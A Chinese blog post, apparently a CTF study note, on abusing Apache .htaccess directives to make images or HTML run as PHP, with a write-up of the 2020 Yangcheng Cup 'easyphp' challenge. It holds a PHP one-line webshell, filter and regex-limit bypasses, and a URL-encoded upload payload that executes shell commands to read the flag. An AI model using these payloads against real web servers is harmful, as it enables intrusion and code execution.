<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.2.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/luo.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/luo.jpg">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <link rel="manifest" href="/manifest.json">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css" integrity="sha256-XOqroi11tY4EFQMR9ZYwZWKj5ZXiftSx36RRuC3anlA=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"luokuang1.github.io","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.20.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":true,"show_result":true,"style":"mac"},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideDownBigOut"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="相关的文章为：https:&#x2F;&#x2F;blog.csdn.net&#x2F;solitudi&#x2F;article&#x2F;details&#x2F;116666720 .htaccess配置文件的基本信息首先先了解一下有关.htaccess文件是什么，是一个配置文件，用于运行Apache网络服务器软件的网络服务器上，当.htaccess文件被放置在一个 “通过Apache Web服务器加载 “的目录中时，.htaccess文件会被Apa">
<meta property="og:type" content="article">
<meta property="og:title" content="浅谈ctf中.htaccess配置文件的运用">
<meta property="og:url" content="https://luokuang1.github.io/2024/07/23/%E6%B5%85%E8%B0%88ctf%E4%B8%AD-htaccess%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E7%9A%84%E8%BF%90%E7%94%A8/index.html">
<meta property="og:site_name" content="luokuang&#39;s blog">
<meta property="og:description" content="相关的文章为：https:&#x2F;&#x2F;blog.csdn.net&#x2F;solitudi&#x2F;article&#x2F;details&#x2F;116666720 .htaccess配置文件的基本信息首先先了解一下有关.htaccess文件是什么，是一个配置文件，用于运行Apache网络服务器软件的网络服务器上，当.htaccess文件被放置在一个 “通过Apache Web服务器加载 “的目录中时，.htaccess文件会被Apa">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-07-23T13:40:19.000Z">
<meta property="article:modified_time" content="2024-10-14T11:58:02.117Z">
<meta property="article:author" content="luokuang">
<meta property="article:tag" content="ctf htaccess">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="https://luokuang1.github.io/2024/07/23/%E6%B5%85%E8%B0%88ctf%E4%B8%AD-htaccess%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E7%9A%84%E8%BF%90%E7%94%A8/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://luokuang1.github.io/2024/07/23/%E6%B5%85%E8%B0%88ctf%E4%B8%AD-htaccess%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E7%9A%84%E8%BF%90%E7%94%A8/","path":"2024/07/23/浅谈ctf中-htaccess配置文件的运用/","title":"浅谈ctf中.htaccess配置文件的运用"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>浅谈ctf中.htaccess配置文件的运用 | luokuang's blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<link rel="alternate" href="/atom.xml" title="luokuang's blog" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">luokuang's blog</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">Strive to see a better version of yourself</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li><li class="menu-item menu-item-links"><a href="/links/" rel="section"><i class="fa fa-link fa-fw"></i>友链</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#htaccess%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E7%9A%84%E5%9F%BA%E6%9C%AC%E4%BF%A1%E6%81%AF"><span class="nav-number">1.</span> <span class="nav-text">.htaccess配置文件的基本信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%B7%E4%BD%93%E7%9A%84%E8%BF%90%E7%94%A8"><span class="nav-number">2.</span> <span class="nav-text">具体的运用</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%80%9A%E8%BF%87-htaccess%E6%96%87%E4%BB%B6%E6%9D%A5%E5%88%B6%E5%AE%9A%E5%87%BA%E9%94%99%E9%A1%B5%E9%9D%A2"><span class="nav-number">2.1.</span> <span class="nav-text">通过.htaccess文件来制定出错页面</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#SetHandler%E5%92%8CForceType"><span class="nav-number">2.2.</span> <span class="nav-text">SetHandler和ForceType</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#AddHandler"><span class="nav-number">2.3.</span> <span class="nav-text">AddHandler</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#AddType"><span class="nav-number">2.4.</span> <span class="nav-text">AddType</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#php-value"><span class="nav-number">2.5.</span> <span class="nav-text">php_value</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%B7%E4%BD%93%E7%9A%84%E4%BE%8B%E9%A2%98"><span class="nav-number">3.</span> <span class="nav-text">具体的例题</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#lt-php-system-%E2%80%98cat-f-%E2%80%99-gt"><span class="nav-number"></span> <span class="nav-text">&lt;?php system(‘cat &#x2F;f*’);?&gt;</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#lt-php-system-%E2%80%98cat-f-%E2%80%99-gt-1"><span class="nav-number"></span> <span class="nav-text">&lt;?php system(‘cat &#x2F;f*’);?&gt;\</span></a></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="luokuang"
      src="/images/luo.jpg">
  <p class="site-author-name" itemprop="name">luokuang</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">10</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://luokuang1.github.io/2024/07/23/%E6%B5%85%E8%B0%88ctf%E4%B8%AD-htaccess%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E7%9A%84%E8%BF%90%E7%94%A8/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/luo.jpg">
      <meta itemprop="name" content="luokuang">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="luokuang's blog">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="浅谈ctf中.htaccess配置文件的运用 | luokuang's blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          浅谈ctf中.htaccess配置文件的运用
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2024-07-23 21:40:19" itemprop="dateCreated datePublished" datetime="2024-07-23T21:40:19+08:00">2024-07-23</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2024-10-14 19:58:02" itemprop="dateModified" datetime="2024-10-14T19:58:02+08:00">2024-10-14</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E5%AD%A6%E4%B9%A0/" itemprop="url" rel="index"><span itemprop="name">学习</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>相关的文章为：<a target="_blank" rel="noopener" href="https://blog.csdn.net/solitudi/article/details/116666720">https://blog.csdn.net/solitudi/article/details/116666720</a></p>
<h3 id="htaccess配置文件的基本信息"><a href="#htaccess配置文件的基本信息" class="headerlink" title=".htaccess配置文件的基本信息"></a>.htaccess配置文件的基本信息</h3><p>首先先了解一下有关.htaccess文件是什么，是一个配置文件，用于运行Apache网络服务器软件的网络服务器上，当.htaccess文件被放置在一个 “通过Apache Web服务器加载 “的目录中时，.htaccess文件会被Apache Web服务器软件检测并执行。这些.htaccess文件可以用来改变Apache Web服务器软件的配置，以启用/禁用Apache Web服务器软件所提供的额外功能和特性。 简单来说就是用来修改配置的</p>
<p>然后补充一点就是在.htaccess配置文件中单行注释符为 # </p>
<p>如果想要在服务器上可以运行.htaccess文件就需要先将主配置文件的AllowOverride 设置为 All</p>
<h3 id="具体的运用"><a href="#具体的运用" class="headerlink" title="具体的运用"></a>具体的运用</h3><h4 id="通过-htaccess文件来制定出错页面"><a href="#通过-htaccess文件来制定出错页面" class="headerlink" title="通过.htaccess文件来制定出错页面"></a>通过.htaccess文件来制定出错页面</h4><blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">ErrorDocument <span class="number">401</span> /error/<span class="number">401</span>.php</span><br><span class="line">ErrorDocument <span class="number">403</span> /error/<span class="number">403</span>.php</span><br><span class="line">ErrorDocument <span class="number">404</span> /error/<span class="number">404</span>.php</span><br><span class="line">ErrorDocument <span class="number">500</span> /error/<span class="number">500</span>.php</span><br></pre></td></tr></table></figure>
</blockquote>
<p>在ctf比赛题目中就有应用：</p>
<blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;If <span class="string">&quot;file(&#x27;/flag&#x27;) =~ &#x27;/flag&#123;a/&#x27;&quot;</span>&gt;  <span class="comment">//~ 类似为正则匹对</span></span><br><span class="line">ErrorDocument <span class="number">404</span> <span class="string">&quot;y4tacker&quot;</span></span><br><span class="line">&lt;/If&gt;</span><br></pre></td></tr></table></figure>
</blockquote>
<p>如果在/flag中有flag{a 就返回y4tacker，从而来枚举出flag,比较少用</p>
<h4 id="SetHandler和ForceType"><a href="#SetHandler和ForceType" class="headerlink" title="SetHandler和ForceType"></a>SetHandler和ForceType</h4><p>常见的应用场景 文件上传，这里要严格按照缩进，可能会出现错误：</p>
<blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;FilesMatch <span class="string">&quot;aaa.jpg&quot;</span>&gt;</span><br><span class="line">  SetHandler application/x-httpd-php</span><br><span class="line">&lt;/FilesMatch&gt;</span><br><span class="line"><span class="comment">//指定将1.jpg通过PHP运行</span></span><br><span class="line"><span class="comment">//或者直接全局都直接使用PHP解析</span></span><br><span class="line">SetHandler application/x-httpd-php</span><br><span class="line"></span><br><span class="line">&lt;Files ~ <span class="string">&quot;\.jpg$&quot;</span>&gt;   <span class="comment">//~先当于正则匹对 将所有匹对到.jpg结尾的都以PHP解析</span></span><br><span class="line">ForceType application/x-httpd-php  </span><br><span class="line">&lt;/Files&gt;</span><br></pre></td></tr></table></figure>
</blockquote>
<h4 id="AddHandler"><a href="#AddHandler" class="headerlink" title="AddHandler"></a>AddHandler</h4><p>作用就是将什么以什么方式解析，作用域是针对整个服务器或特定目录的，而不是针对单个文件的，所以不需要通过Files来进行规定</p>
<blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AddHandler php-script .jpg  <span class="comment">//将jpg文件当作PHP脚本</span></span><br></pre></td></tr></table></figure>
</blockquote>
<h4 id="AddType"><a href="#AddType" class="headerlink" title="AddType"></a><strong>AddType</strong></h4><p>是Apache服务器配置中的一个重要指令，它用于将特定的文件扩展名映射到指定的MIME类型</p>
<blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AddType application/x-httpd-php .html</span><br></pre></td></tr></table></figure>
</blockquote>
<p>这条指令告诉Apache服务器，当遇到.html扩展名的文件时，应该将它们视为application/x-httpd-php类型的文件，即PHP脚本文件，并由PHP解析器进行处理</p>
<h4 id="php-value"><a href="#php-value" class="headerlink" title="php_value"></a>php_value</h4><p>当使用 PHP 作为 Apache 模块时，也可以用 Apache 的配置文件（例如 httpd.conf）和 .htaccess  文件中的指令来修改 php 的配置设定。需要有AllowOverride Options 或AllowOverride All 权限才可以</p>
<p>php_value 设定指定的值。要清除先前设定的值，把 value 设为 none。不要用 php_value 设定布尔值。应该用 php_flag</p>
<p>实际的应用中就有：</p>
<blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">php_value auto_prepend_file <span class="number">1</span>.txt <span class="comment">//在主文件解析之前自动解析包含1.txt的内容</span></span><br><span class="line">php_value auto_append_file <span class="number">2</span>.txt <span class="comment">//在主文件解析后自动解析1.txt的内容</span></span><br><span class="line"><span class="comment">//最好是这样，应用#号为注释符，但是PHP可以正常解析来上传一句话木马</span></span><br><span class="line">php_value auto_prepend_file .htaccess <span class="comment">#&lt;?php @eval($_POST[&#x27;a&#x27;]);?&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//关于过滤file： 这样也是可以执行命令的</span></span><br><span class="line">php_value auto_prepend_fi\</span><br><span class="line">le .htaccess</span><br><span class="line"><span class="comment">#&lt;?php phpinfo();</span></span><br></pre></td></tr></table></figure>
</blockquote>
<p>还有一种用法，绕过preg_match匹对，将最大的次数改为0即可，就可以用最大回溯(pcre.backtrack_limit)/递归限制使php正则失效：</p>
<blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php_value pcre.backtrack_limit <span class="number">1</span>  <span class="comment">//默认为100000</span></span><br></pre></td></tr></table></figure>
</blockquote>
<h3 id="具体的例题"><a href="#具体的例题" class="headerlink" title="具体的例题"></a>具体的例题</h3><p>[羊城杯 2020]easyphp</p>
<p>源码：</p>
<blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"> <span class="variable">$files</span> = <span class="title function_ invoke__">scandir</span>(<span class="string">&#x27;./&#x27;</span>);  </span><br><span class="line"> <span class="keyword">foreach</span>(<span class="variable">$files</span> <span class="keyword">as</span> <span class="variable">$file</span>) &#123;   <span class="comment">//遍历目录，将不是index.php的文件都删除</span></span><br><span class="line">     <span class="keyword">if</span>(<span class="title function_ invoke__">is_file</span>(<span class="variable">$file</span>))&#123; </span><br><span class="line">         <span class="keyword">if</span> (<span class="variable">$file</span> !== <span class="string">&quot;index.php&quot;</span>) &#123; </span><br><span class="line">             <span class="title function_ invoke__">unlink</span>(<span class="variable">$file</span>);  </span><br><span class="line">         &#125; </span><br><span class="line">     &#125; </span><br><span class="line"> &#125; </span><br><span class="line"> <span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;content&#x27;</span>]) || !<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;filename&#x27;</span>])) &#123; <span class="comment">//通过get来提交文件名和内容</span></span><br><span class="line">     <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>); </span><br><span class="line">     <span class="keyword">die</span>(); </span><br><span class="line"> &#125; </span><br><span class="line"> <span class="variable">$content</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;content&#x27;</span>];  <span class="comment">//在文件内容里面过滤关键字</span></span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">stristr</span>(<span class="variable">$content</span>,<span class="string">&#x27;on&#x27;</span>) || <span class="title function_ invoke__">stristr</span>(<span class="variable">$content</span>,<span class="string">&#x27;html&#x27;</span>) || <span class="title function_ invoke__">stristr</span>(<span class="variable">$content</span>,<span class="string">&#x27;type&#x27;</span>) || <span class="title function_ invoke__">stristr</span>(<span class="variable">$content</span>,<span class="string">&#x27;flag&#x27;</span>) || <span class="title function_ invoke__">stristr</span>(<span class="variable">$content</span>,<span class="string">&#x27;upload&#x27;</span>) || <span class="title function_ invoke__">stristr</span>(<span class="variable">$content</span>,<span class="string">&#x27;file&#x27;</span>)) &#123; </span><br><span class="line">     <span class="keyword">echo</span> <span class="string">&quot;Hacker&quot;</span>; </span><br><span class="line">     <span class="keyword">die</span>(); </span><br><span class="line"> &#125; </span><br><span class="line"> <span class="variable">$filename</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;filename&#x27;</span>];   <span class="comment">//</span></span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/[^a-z\.]/&quot;</span>, <span class="variable">$filename</span>) == <span class="number">1</span>) &#123; <span class="comment">//检查文件名是否都由字母和点组成</span></span><br><span class="line">     <span class="keyword">echo</span> <span class="string">&quot;Hacker&quot;</span>; </span><br><span class="line">     <span class="keyword">die</span>(); </span><br><span class="line"> &#125; </span><br><span class="line"> <span class="variable">$files</span> = <span class="title function_ invoke__">scandir</span>(<span class="string">&#x27;./&#x27;</span>);  <span class="comment">//再删除一次</span></span><br><span class="line"> <span class="keyword">foreach</span>(<span class="variable">$files</span> <span class="keyword">as</span> <span class="variable">$file</span>) &#123; </span><br><span class="line">     <span class="keyword">if</span>(<span class="title function_ invoke__">is_file</span>(<span class="variable">$file</span>))&#123; </span><br><span class="line">         <span class="keyword">if</span> (<span class="variable">$file</span> !== <span class="string">&quot;index.php&quot;</span>) &#123; </span><br><span class="line">             <span class="title function_ invoke__">unlink</span>(<span class="variable">$file</span>); </span><br><span class="line">         &#125; </span><br><span class="line">     &#125; </span><br><span class="line"> &#125; </span><br><span class="line"> <span class="title function_ invoke__">file_put_contents</span>(<span class="variable">$filename</span>, <span class="variable">$content</span> . <span class="string">&quot;\nHello, world&quot;</span>);  <span class="comment">//在后面拼接一段字符串</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
</blockquote>
<p>看逻辑应该是在删除后再创建的文件，但是上传一个普通的php文件，发现上传什么都没有用，无论怎么上传，页面都只是显示Hello, world</p>
<p>这里就可以通过上传.htaccess来修改配置</p>
<blockquote>
<p>php_value auto_prepend_file .htaccess</p>
<h1 id="lt-php-system-‘cat-f-’-gt"><a href="#lt-php-system-‘cat-f-’-gt" class="headerlink" title="&lt;?php system(‘cat /f*’);?&gt;"></a>&lt;?php system(‘cat /f*’);?&gt;</h1></blockquote>
<p>但是需要有些修改，还有要将后面的\nHello, world继续拼接否则回报错</p>
<p>这里过滤了file 可以通过变为</p>
<blockquote>
<p>php_value auto_prepend_fil\<br>e .htaccess</p>
<h1 id="lt-php-system-‘cat-f-’-gt-1"><a href="#lt-php-system-‘cat-f-’-gt-1" class="headerlink" title="&lt;?php system(‘cat /f*’);?&gt;\"></a>&lt;?php system(‘cat /f*’);?&gt;\</h1></blockquote>
<p>最后再通过url编码上传即可</p>
<p>最后payload为：</p>
<blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?filename=.htaccess&amp;content=php_value%<span class="number">20</span>auto_prepend_fil%<span class="number">5</span>C%<span class="number">0</span>Ae%<span class="number">20</span>.htaccess%<span class="number">0</span>A%<span class="number">23</span>%<span class="number">3</span>C%<span class="number">3</span>Fphp%<span class="number">20</span>system(<span class="string">&#x27;cat%20/f*&#x27;</span>)%<span class="number">3</span>B%<span class="number">3</span>F%<span class="number">3</span>E%<span class="number">5</span>C</span><br></pre></td></tr></table></figure>
</blockquote>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/ctf-htaccess/" rel="tag"># ctf htaccess</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2024/07/18/CTFshow-web361-371/" rel="prev" title="CTFshow-web361~371">
                  <i class="fa fa-angle-left"></i> CTFshow-web361~371
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2024/07/28/%E6%AD%A6%E5%8A%9F%E5%B1%B1%E6%9D%AF%C2%B7%E6%B9%98%E8%B5%A3%E8%BE%B9%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3%E5%A4%8D%E7%8E%B0/" rel="next" title="武功山杯·湘赣边大学生网络安全竞赛部分题解">
                  武功山杯·湘赣边大学生网络安全竞赛部分题解 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">luokuang</span>
  </div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>




    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  






  





<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
